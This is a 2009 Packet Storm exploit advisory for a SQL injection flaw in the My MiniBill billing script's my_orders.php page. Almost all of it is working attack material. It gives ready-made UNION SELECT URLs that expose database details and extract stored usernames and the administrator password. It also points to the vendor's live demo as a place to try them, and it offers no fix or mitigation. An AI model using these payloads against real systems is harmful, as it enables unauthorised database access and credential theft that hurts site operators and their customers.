My Mini Bill SQL Injection

2009-06-04T00:00:00
ID PACKETSTORM:78069
Type packetstorm
Reporter ThE g0bL!N
Modified 2009-06-04T00:00:00

Description

                                        
                                            `My MiniBill (my_orders.php) Remote SQL Injection  
Founder: ThE g0bL!N  
------  
Home: http:/www.4ckx.com/dz/  
----  
Vendor:http://cupidsystems.com  
------  
More info:http://cupidsystems.com/products/myminibill/index.php  
--------  
Note: First You must register in the site [path]/register.php  
Then Go To exploit:  
------------------  
http://victim/[path]/my_orders.php?action=status&orderid=-68+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9--  
Login Information:  
-----------------  
For:  
username: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,username,5,6,7,8,9+from+dbminibill.tblorders+limit+0,1  
Password: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,adminpassword,5,6,7,8,9+from+tblgeneral  
Demo:  
http://cupidsystems.com/products/myminibill/demo/  
Note: ALgerie en Coupe Du Monde In shaa ALLAH*  
################################################################################################  
  
  
  
  
`